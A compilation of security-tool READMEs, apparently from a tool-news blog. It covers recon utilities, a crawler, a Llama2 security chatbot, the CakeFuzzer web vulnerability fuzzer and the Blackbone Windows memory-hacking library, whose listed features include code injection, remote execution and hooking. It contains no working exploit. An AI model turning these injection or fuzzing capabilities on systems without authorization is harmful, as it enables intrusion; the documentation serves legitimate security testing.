cd associated-threat-analyzer && pip3 install -r requirements.txt
python3 analyzer.py -d target-web.com

From Dockerfile

You can run this application on a container after build a Dockerfile.

Warning : If you want to run a Docker container, associated threat analyzer recommends to use your malicious IPs and domains lists, because maintainer may not be update a default malicious IP and domain lists on docker image.
docker build -t osmankandemir/threatanalyzer .
docker run osmankandemir/threatanalyzer -d target-web.com

From DockerHub

docker pull osmankandemir/threatanalyzer
docker run osmankandemir/threatanalyzer -d target-web.com

Usage

-d DOMAIN , --domain DOMAIN Input Target. --domain target-web1.com
-t DOMAINSFILE, --DomainsFile Malicious Domains List to Compare. -t SampleMaliciousDomains.txt
-i IPSFILE, --IPsFile Malicious IPs List to Compare. -i SampleMaliciousIPs.txt
-o JSON, --json JSON JSON output. --json

DONE

  • First-level depth scan your domain address.

TODO list

  • Third-level or the more depth static files scanning for target web application.
Other linked github project. You can take a look.
Finds related domains and IPv4 addresses to do threat intelligence after Indicator-Intelligence v1.1.1 collects static files

https://github.com/OsmanKandemir/indicator-intelligence

Default Malicious IPs and Domains Sources

https://github.com/stamparm/blackbook

https://github.com/stamparm/ipsum

Development and Contribution

See; CONTRIBUTING.md



Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

By: Zion3R


xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.


Features

  • Fetches domains from curated passive sources to maximize results.

  • Supports stdin and stdout for easy integration into workflows.

  • Cross-Platform (Windows, Linux & macOS).

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xsubfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xsubfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xsubfind3r.git 
  • Build the utility

     cd xsubfind3r/cmd/xsubfind3r && \
    go build .
  • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

Example config.yaml:

version: 0.3.0
sources:
- alienvault
- anubis
- bevigil
- chaos
- commoncrawl
- crtsh
- fullhunt
- github
- hackertarget
- intelx
- shodan
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
chaos:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
fullhunt:
- 0d9652ce-516c-4315-b589-9b241ee6dc24
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xsubfind3r use the -h flag:

xsubfind3r -h

help message:


_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

USAGE:
xsubfind3r [OPTIONS]

INPUT:
-d, --domain string[] target domains
-l, --list string target domains' list file path

SOURCES:
--sources bool list supported sources
-u, --sources-to-use string[] comma(,) separeted sources to use
-e, --sources-to-exclude string[] comma(,) separeted sources to exclude

OPTIMIZATION:
-t, --threads int number of threads (default: 50)

OUTPUT:
--no-color bool disable colored output
-o, --output string output subdomains' file path
-O, --output-directory string output subdomains' directory path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)

Contribution

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



HackBot - A Simple Cli Chatbot Having Llama2 As Its Backend Chat AI

By: Zion3R


Welcome to HackBot, an AI-powered cybersecurity chatbot designed to provide helpful and accurate answers to your cybersecurity-related queries and also do code analysis and scan analysis. Whether you are a security researcher, an ethical hacker, or just curious about cybersecurity, HackBot is here to assist you in finding the information you need.

HackBot utilizes the powerful language model Meta-LLama2 through the "LlamaCpp" library. This allows HackBot to respond to your questions in a coherent and relevant manner. Please make sure to keep your queries in English and adhere to the guidelines provided to get the best results from HackBot.


Features

  • AI Cybersecurity Chat: HackBot can answer various cybersecurity-related queries, helping you with penetration testing, security analysis, and more.
  • Interactive Interface: The chatbot provides an interactive command-line interface, making it easy to have conversations with HackBot.
  • Clear Output: HackBot presents its responses in a well-formatted markdown, providing easily readable and organized answers.
  • Static Code Analysis: Utilizes the provided scan data or log file for conducting static code analysis. It thoroughly examines the source code without executing it, identifying potential vulnerabilities, coding errors, and security issues.
  • Vulnerability Analysis: Performs a comprehensive vulnerability analysis using the provided scan data or log file. It identifies and assesses security weaknesses, misconfigurations, and potential exploits present in the target system or network.

How it looks

Chat:

Static Code analysis:

Vulnerability analysis:

Installation

Prerequisites

Before you proceed with the installation, ensure you have the following prerequisites:

Step 1: Clone the Repository

git clone https://github.com/morpheuslord/hackbot.git
cd hackbot

Step 2: Install Dependencies

pip install -r requirements.txt

Step 3: Download the AI Model

python hackbot.py

The first time you run HackBot, it will check for the AI model required for the chatbot. If the model is not present, it will be automatically downloaded and saved as "llama-2-7b-chat.ggmlv3.q4_0.bin" in the project directory.

Usage

To start a conversation with HackBot, run the following command:

python hackbot.py

HackBot will display a banner and wait for your input. You can ask cybersecurity-related questions, and HackBot will respond with informative answers. To exit the chat, simply type "quit_bot" in the input prompt.

Here are some additional commands you can use:

  • clear_screen: Clears the console screen for better readability.
  • quit_bot: This is used to quit the chat application
  • bot_banner: Prints the default bots banner.
  • contact_dev: Provides my contact information.
  • save_chat: Saves the current sessions interactions.
  • vuln_analysis: Does a Vuln analysis using the scan data or log file.
  • static_code_analysis: Does a Static code analysis using the scan data or log file.

Note: I am working on more addons and more such commands to give a more chatGPT experience

Please Note: HackBot's responses are based on the Meta-LLama2 AI model, and its accuracy depends on the quality of the queries and data provided to it.

I am also working on AI training by which I can teach it how to be more accurately tuned to work for hackers on a much more professional level.

Contributing

We welcome contributions to improve HackBot's functionality and accuracy. If you encounter any issues or have suggestions for enhancements, please feel free to open an issue or submit a pull request. Follow these steps to contribute:

  1. Fork the repository.
  2. Create a new branch with a descriptive name.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request to the main branch of this repository.

Please maintain a clean commit history and adhere to the project's coding guidelines.

AI training

If anyone with the know-how of training text generation models can help improve the code.

Contact

For any questions, feedback, or inquiries related to HackBot, feel free to contact the project maintainer:



Xcrawl3R - A CLI Utility To Recursively Crawl Webpages

By: Zion3R


xcrawl3r is a command-line interface (CLI) utility to recursively crawl webpages i.e systematically browse webpages' URLs and follow links to discover linked webpages' URLs.


Features

  • Recursively crawls webpages for URLs.
  • Parses URLs from files (.js, .json, .xml, .csv, .txt & .map).
  • Parses URLs from robots.txt.
  • Parses URLs from sitemaps.
  • Renders pages (including Single Page Applications such as Angular and React).
  • Cross-Platform (Windows, Linux & macOS)

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xcrawl3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r executable.

...move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xcrawl3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xcrawl3r/cmd/xcrawl3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xcrawl3r.git 
  • Build the utility

     cd xcrawl3r/cmd/xcrawl3r && \
    go build .
  • Move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xcrawl3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

NOTE: While the development version is a good way to take a peek at xcrawl3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Usage

To display help message for xcrawl3r use the -h flag:

xcrawl3r -h

help message:

                             _ _____      
__ _____ _ __ __ ___ _| |___ / _ __
\ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
> < (__| | | (_| |\ V V /| |___) | |
/_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0

A CLI utility to recursively crawl webpages.

USAGE:
xcrawl3r [OPTIONS]

INPUT:
-d, --domain string domain to match URLs
--include-subdomains bool match subdomains' URLs
-s, --seeds string seed URLs file (use `-` to get from stdin)
-u, --url string URL to crawl

CONFIGURATION:
--depth int maximum depth to crawl (default 3)
TIP: set it to `0` for infinite recursion
--headless bool If true the browser will be displayed while crawling.
-H, --headers string[] custom header to include in requests
e.g. -H 'Referer: http://example.com/'
TIP: use multiple flag to set multiple headers
--proxy string[] Proxy URL (e.g: http://127.0.0.1:8080)
TIP: use multiple flag to set multiple proxies
--render bool utilize a headless chrome instance to render pages
--timeout int time to wait for request in seconds (default: 10)
--user-agent string User Agent to use (default: web)
TIP: use `web` for a random web user-agent,
`mobile` for a random mobile user-agent,
or you can set your specific user-agent.

RATE LIMIT:
-c, --concurrency int number of concurrent fetchers to use (default 10)
--delay int delay between each request in seconds
--max-random-delay int maximux extra randomized delay added to `--dalay` (default: 1s)
-p, --parallelism int number of concurrent URLs to process (default: 10)

OUTPUT:
--debug bool enable debug mode (default: false)
-m, --monochrome bool coloring: no colored output mode
-o, --output string output file to write found URLs
-v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.

Credits



Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

By: Zion3R


xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.


Features

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xurlfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xurlfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xurlfind3r.git 
  • Build the utility

     cd xurlfind3r/cmd/xurlfind3r && \
    go build .
  • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xurlfind3r will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

Example config.yaml:

version: 0.2.0
sources:
- bevigil
- commoncrawl
- github
- intelx
- otx
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xurlfind3r use the -h flag:

xurlfind3r -h

help message:

                 _  __ _           _ _____      
__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

USAGE:
xurlfind3r [OPTIONS]

TARGET:
-d, --domain string (sub)domain to match URLs

SCOPE:
--include-subdomains bool match subdomain's URLs

SOURCES:
-s, --sources bool list sources
-u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
--skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
--skip-wayback-source bool with wayback , skip parsing source code snapshots

FILTER & MATCH:
-f, --filter string regex to filter URLs
-m, --match string regex to match URLs

OUTPUT:
--no-color bool no color mode
-o, --output string output URLs file path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

Examples

Basic

xurlfind3r -d hackerone.com --include-subdomains

Filter Regex

# filter images
xurlfind3r -d hackerone.com --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'

Match Regex

# match js URLs
xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



CakeFuzzer - Automatically And Continuously Discover Vulnerabilities In Web Applications Created Based On Specific Frameworks

By: Zion3R


Cake Fuzzer is a project that is meant to help automatically and continuously discover vulnerabilities in web applications created based on specific frameworks with very limited false positives. Currently it is implemented to support the Cake PHP framework.

If you would like to learn more about the research process check out this article series: CakePHP Application Cybersecurity Research


Project goals

Typical approaches to discovering vulnerabilities using automated tools in web applications are:

  • Static Application Security Testing (SAST) – Method that involves a scanner detecting vulnerabilities based on the source code without running the application
  • Dynamic Application Security Testing (DAST) – Method that incorporates a vulnerability scanner that attacks the running application and identifies the vulnerabilities based on the application responses

Both methods have disadvantages. SAST results in a high percentage of false positives – findings that are either not vulnerabilities or not exploitable vulnerabilities. DAST results in fewer false positives but discovers fewer vulnerabilities due to the limited information. It also requires some knowledge about the application and a security background of a person who runs a scan. This often comes with a custom scan configuration per application to work properly.

The Cake Fuzzer project is meant to combine the advantages of both approaches and eliminate the above-mentioned disadvantages. This approach is called Interactive Application Security Testing (IAST).

The goals of the project are:

  • Create an automated process of discovering vulnerabilities in applications based on the CakePHP Framework
  • No application knowledge requirement or pre-configuration of the web application
  • Result with minimal or close to 0 amount of false positives
  • Require minimal security knowledge to run the scanner

Note: Some classes of vulnerabilities are not the target of the Cake Fuzzer, therefore Cake Fuzzer will not be able to detect them. Examples of those classes are business logic vulnerabilities and access control issues.

Architecture

Overview

Drawio: Cake Fuzzer Architecture

Cake Fuzzer consists of 3 main (fairly independent) servers that in total allow for dynamic vulnerability testing of CakePHP allications.

  • AttackQueue - Scheduling and execution of attack scenarios.
  • Monitors - Monitoring of given entities (executor outputs / file contents / processes / errors ).
  • Registry - Storage and classification of found vulnerabilities. They run independently. AttackQueue can add new scanners to monitors, and Monitors can schedule new attacks (eg based on found vulnerability to further attack application).

Other components include:

  • Fuzzer - defines and schedules attacks to AttackQueue (serves as entry)
  • Configuration - sets up application dependent info (eg. path to CakePHP application)
  • Instrumentation - based on configuration defines changes to the application / os to prepare the ground for attacks.

Approach

Cake Fuzzer is based on the concept of Interactive Application Security Testing (IAST). It contains a predefined set of attacks that are randomly modified before the execution. Cake Fuzzer has the knowledge of the application internals thanks to the Cake PHP framework therefore the attacks will be launched on all possible entry points of the application.

During the attack, the Cake Fuzzer monitors various aspects of the application and the underlying system such as:

  • network connection,
  • file system,
  • application response,
  • error logs.

These sources of information allow Cake Fuzzer to identify more vulnerabilities and report them with higher certainty.

Requirements

Development environment using MISP on VMWare virtual machine

The following section describes steps to setup a Cake Fuzzer development environment where the target is outdated MISP v2.4.146 that is vulnerable to CVE-2021-41326.

Requirements

  • VMWare Workstation (Other virtualization platform can be used as long as they support sharing/mounting directories between host and guest OS)

Steps

Run the following commands on your host operating system to download an outdated MISP VM:

cd ~/Downloads # Or wherever you want to store the MISP VM
wget https://vm.misp-project.org/MISP_v2.4.146@0c25b72/MISP_v2.4.146@0c25b72-VMware.zip -O MISP.zip
unzip MISP.zip
rm MISP.zip
mv VMware/ MISP-2.4.146

Conduct the following actions in VMWare GUI to prepare sharing Cake Fuzzer files between your host OS and MISP:

  1. Open virtual machine in VMWare and go to > Settings > Options > Shared Folders > Add.
  2. Mount directory where you keep Cake Fuzzer on your host OS and name it cake_fuzzer on the VM.
  3. Start the VM.
  4. Note the IP address displayed in the VMWare window after MISP fully boots up.

Run the following commands on your host OS (replace MISP_IP_ADDRESS with previously noted IP address):

ssh-copy-id misp@MISP_IP_ADDRESS
ssh misp@MISP_IP_ADDRESS

Once you SSH into the MISP run the following commands (in MISP terminal) to finish setup of sharing Cake Fuzzer files between host OS and MISP:

instrumentation (one of the patches) sudo vmhgfs-fuse .host:/cake_fuzzer /cake_fuzzer -o allow_other -o uid=1000 ls -l /cake_fuzzer # If everything went fine you should see content of the Cake Fuzzer directory from your host OS. Any changes on your host OS will be reflected inside the VM and vice-versa." dir="auto">
sudo apt update
sudo apt-get -y install open-vm-tools open-vm-tools-desktop
sudo apt-get -y install build-essential module-assistant linux-headers-virtual linux-image-virtual && sudo dpkg-reconfigure open-vm-tools
sudo mkdir /cake_fuzzer # Note: This path is fixed as it's hardcoded in the instrumentation (one of the patches)
sudo vmhgfs-fuse .host:/cake_fuzzer /cake_fuzzer -o allow_other -o uid=1000
ls -l /cake_fuzzer # If everything went fine you should see content of the Cake Fuzzer directory from your host OS. Any changes on your host OS will be reflected inside the VM and vice-versa.

Prepare MISP for simple testing (in MISP terminal):

CAKE=/var/www/MISP/app/Console/cake
SUDO='sudo -H -u www-data'
$CAKE userInit -q
$SUDO $CAKE Admin setSetting "Security.password_policy_length" 1
$SUDO $CAKE Admin setSetting "Security.password_policy_complexity" '/.*/'
$SUDO $CAKE Password admin@admin.test admin --override_password_change

Finally instal Cake Fuzzer dependencies and prepare the venv (in MISP terminal):

source /cake_fuzzer/precheck.sh

Contribution to Vulnerability Database

Cake Fuzzer scans for vulnerabilities that inside of /cake_fuzzer/strategies folder.

To add a new attack we need to add a new new-attack.json file to strategies folder. Each vulnerability contains 2 major fileds:Scenarios and Scanners. Scenarios where attack payloads base forms stored. Scanners in the other hand detecting regex or pharases for response, stout, sterr, logs, and results.

Creating payload for Scenarios

To create a payload first you need to have the understanding of the vulnerability and how to detect it with as few payloads as possible.

  • While constructing the scenario you should think of as most generic payload as possible. However, the more generic payload, the more chances are that it will produce false-positives.

  • It is preferable to us a canary value such as__cakefuzzer__new-attack_§CAKEFUZZER_PAYLOAD_GUID§__ in your scenarios. Canary value contains a fixed string (for example: __cakefuzzer__new-attack_) and a dynamic identifier that will be changed dynamically by the fuzzer (GUID part §CAKEFUZZER_PAYLOAD_GUID§). First canary part is used to ensure that payload is detected by Scanners. Second canary part, the GUID is translated to pseudo-random value on every execution of your payload. So whenever your payload will be injected into the a parameter used by the application, the canary will be changed to something like this: __cakefuzzer__new-attack_8383938__, where the 8383938 is unique across all other attacks.

Detecting and generating Scanners

To create a scanner, first you need to understand how may the application behave when the vulnerability is triggered. There are few scanner types that you can use such as response, sterr, logs, files, and processes. Each scanner serves a different purpose.

For example when you building a scanner for an XSS, you will look for the indication of the vulnerability in the HTML response of the application. You can use ResultOutputScanner scanner to look for canary value and payload. In other hand SQL Injection vulnerabilities could be detected via error logs. For that purpose you can use LogFilesContentsScanner and ResultErrorsScanner.

  • One of the important points of creating a scanner is finding a regular expression or a pharase that does not catch false-positive values. If you want to contribute a new vulnerability, you should ensure that there is no false-positive by using the new vulnerability in scans.
  • Last attribute of these Scanner regular expressions is generating an efficent regex. Avoid using regex that match all cases .* or .+. They are very time consuming and drasticly increase the time required to finish the entire scan.

Efficiency

As mentioned before efficiency is important part of the vulnerabilities. Both Scenarios and Scanners should include as few elements as possible. This is because Cake Fuzzer executes every single scenario in all possible detected paths multiple times. On the other hand, all responses, new log entries, etc. are constantly checked by the Scanners. There should be a lot of parameters, paths, and end-points detected and therefore using more payload or Scanner affects the efficiency quite a lot.

Removing Specific Vulnerability

If do not want to scan a specific vulnerability class, remove specified json file from the strategies folder, clean the database and run the fuzzer again.

For example if you do not want to scan your applicaiton for SQL Injection vulnerabilities, do the following steps:

First of all remove already prepared attack scenarios. To achive this delete all files inside of the /cake_fuzzer/databases folder:

rm  /cake_fuzzer/databases/*

After that remove the sqlinj.json file from the /cake_fuzzer/strategies

rm /cake_fuzzer/strategies/sqlinj.json

Finally re-run the fuzzer and all cake_fuzzer running proccess without any SQL Injection attack executed.

PoC Usage

Installation

Clone respository

git clone https://github.com/Zigrin-Security/CakeFuzzer /cake_fuzzer

Warning Cake Fuzzer won't work properly if it's under different path than /cake_fuzzer. Keep in mind that it has to be placed under the root directory of the file system, next /root, /tmp, and so on.

Change directory to respository

cd /cake_fuzzer

Venv

Enter virtual environment if you are not already in:

source /cake_fuzzer/precheck.sh

OR

source venv/bin/activate

Configuration

cp config/config.example.ini config/config.ini

Configure config/config.ini:

WEBROOT_DIR="/var/www/html"         # Path to the tested applications `webroot` directory
CONCURRENT_QUEUES=5 # [Optional] Number of attacks executed concurretnly at once
ONLY_PATHS_WITH_PREFIX="/" # [Optional] Fuzzer will generates only attacks for attacks starting with this prefix
EXCLUDE_PATHS="" # [Optional] Fuzzer will exlude from scanning all paths that match this regular expression. If it's empty, all paths will be processed
PAYLOAD_GUID_PHRASE="§CAKEFUZZER_PAYLOAD_GUID§" # [Optional] Internal keyword that is substituted right before attack with unique payload id
INSTRUMENTATION_INI="config/instrumentation_cake4.ini" # [Optional] Path to custom instrumentations of the application.

Execution

Start component processes

Warning During the Cake Fuzzer scan, multiple functionalities of your application will be invoked in uncontrolled manner multiple times. This may result issuing connections to external services your application is connected to, and pulling or pushing data from/to it. It is highly recommended to run Cake Fuzzer in isolated controlled environment without access to sensitive external services.

Note Cake Fuzzer bypass blackholing, CSRF protections, and authorization. It sends all attacks with privileges of a first user in the database. It is recommended that this user has the highest permissions.

The application consists of several components.

Warning All cake_fuzzer commands have to be executed as root.

Before starting the fuzzer make sure your target application is fully instrumented:

python cake_fuzzer.py instrument check

If there are some unapplied changes apply them with:

python cake_fuzzer.py instrument apply

To run cake fuzzer do the following (It's recommended to use at least 3 separate terminal):

# First Terminal
python cake_fuzzer.py run fuzzer # Generates attacks, adds them to the QUEUE and registers new SCANNERS (then exits)
python cake_fuzzer.py run periodic_monitors # Responsible for monitoring (use CTRL+C to stop & exit at the end of the scan)

# Second terminal
python cake_fuzzer.py run iteration_monitors # Responsible for monitoring (use CTRL+C to stop & exit at the end of the scan)

# Third terminal
python cake_fuzzer.py run attack_queue # Starts the ATTACK QUEUE (use CTRL+C to stop & exit at the end of the scan)

# Once all attacks are executed
python cake_fuzzer.py run registry # Generates `results.json` based on found vulnerabilities

Note: There is currently a bug that can change the owner of logs (or any other dynamically changed filies of the target web app). This may cause errors when normally using the web application or even false-negatives on future Cake Fuzzer executions. For MISP we recommend running the following after every execution of the fuzzer:

sudo chown -R www-data:www-data /var/www/MISP/app/tmp/logs/

Once your scan finishes revert the instrumentation:

python cake_fuzzer.py instrument revert

To Run Again

To run cake fuzzer again, do the following:

Delete Applications Logs (as an example to this, MISP logs stored /var/www/MISP/app/tmp/logs)

rm  /var/www/MISP/app/tmp/logs/*

Delete All Files Inside of /cake_fuzzer/databases folder

rm  /cake_fuzzer/databases/*

Delete cake_fuzzer/results.jsonfile (Firstly do not forget to save or examine previous scan resulst)

rm  /cake_fuzzer/results.json

Finally follow previous running proccess again with 3 terminals

FAQ / Troubleshooting

Attack Queue seems like doing nothing

Attack queue marks executed attacks in the database as 'executed' so to run whole suite again you need to remove the database and add attacks again.

Make sure to kill monitors and attack queues before removing the database.

rm database.db*
python cake_fuzzer.py run fuzzer
python cake_fuzzer.py run attack_queue

Target app does not save logs to log files

This is likely due to the fact that the previous log files were overwritten by root. Cake Fuzzer operates as root so new log files will be created with the root as the owner. Remove them:

chmod -R a+w /var/www/MISP/app/tmp/logs/*

No files in /cake_fuzzer dir of a VM after a reboot

If you use VM with sharing cake fuzzer with your host machine, make sure that the host directory is properly attached to the guest VM:

sudo vmhgfs-fuse .host:/cake_fuzzer /cake_fuzzer -o allow_other -o uid=1000

Target app crashes after running Cake Fuzzer

Cake Fuzzer has to be located under the root directory of the machine and the base directory name should be cake_fuzzer specificaly.

mv CakeFuzzer/ /cake_fuzzer

"Patch" errors while runing instrument apply

Instrumentation proccess is a part of Cake Fuzzer execution flow. When you run instrument apply followed by instrument check, both of these commands should result in the same number of changes.

If you get any "patch" error you could apply patches manually and delete problematic patch file. Patches are located under the /cake_fuzzer/cakefuzzer/instrumentation/pathces directory.

Dependency errors

While installing or running if you have python dependency error, manuallay install dependencies after switching to virtual environment.

First switch to the virtual environment

source venv/bin/activate

After that you can install dependecies with pip3.

pip3 install -r requriments.txt

Credits

Inspiration

This project was inspired by:

Commision

This project was commissioned by: Cake Fuzzer is a project that is meant to help automatically and continuously discover vulnerabilities in web applications created based on specific frameworks with very limited false positives. (2)

Initial contributors



Blackbone - Windows Memory Hacking Library

By: Zion3R


Windows memory hacking library

Features

  • x86 and x64 support

Process interaction

  • Manage PEB32/PEB64
  • Manage process through WOW64 barrier

Process Memory

  • Allocate and free virtual memory
  • Change memory protection
  • Read/Write virtual memory

Process modules

  • Enumerate all (32/64 bit) modules loaded. Enumerate modules using Loader list/Section objects/PE headers methods.
  • Get exported function address
  • Get the main module
  • Unlink module from loader lists
  • Inject and eject modules (including pure IL images)
  • Inject 64bit modules into WOW64 processes
  • Manually map native PE images

Threads

  • Enumerate threads
  • Create and terminate threads. Support for cross-session thread creation.
  • Get thread exit code
  • Get main thread
  • Manage TEB32/TEB64
  • Join threads
  • Suspend and resume threads
  • Set/Remove hardware breakpoints

Pattern search

  • Search for arbitrary pattern in local or remote process

Remote code execution

  • Execute functions in remote process
  • Assemble own code and execute it remotely
  • Support for cdecl/stdcall/thiscall/fastcall conventions
  • Support for arguments passed by value, pointer or reference, including structures
  • FPU types are supported
  • Execute code in new thread or any existing one

Remote hooking

  • Hook functions in remote process using int3 or hardware breakpoints
  • Hook functions upon return

Manual map features

  • x86 and x64 image support
  • Mapping into any arbitrary unprotected process
  • Section mapping with proper memory protection flags
  • Image relocations (only 2 types supported. I haven't seen a single PE image with some other relocation types)
  • Imports and Delayed imports are resolved
  • Bound import is resolved as a side effect, I think
  • Module exports
  • Loading of forwarded export images
  • Api schema name redirection
  • SxS redirection and isolation
  • Activation context support
  • Dll path resolving similar to native load order
  • TLS callbacks. Only for one thread and only with PROCESS_ATTACH/PROCESS_DETACH reasons.
  • Static TLS
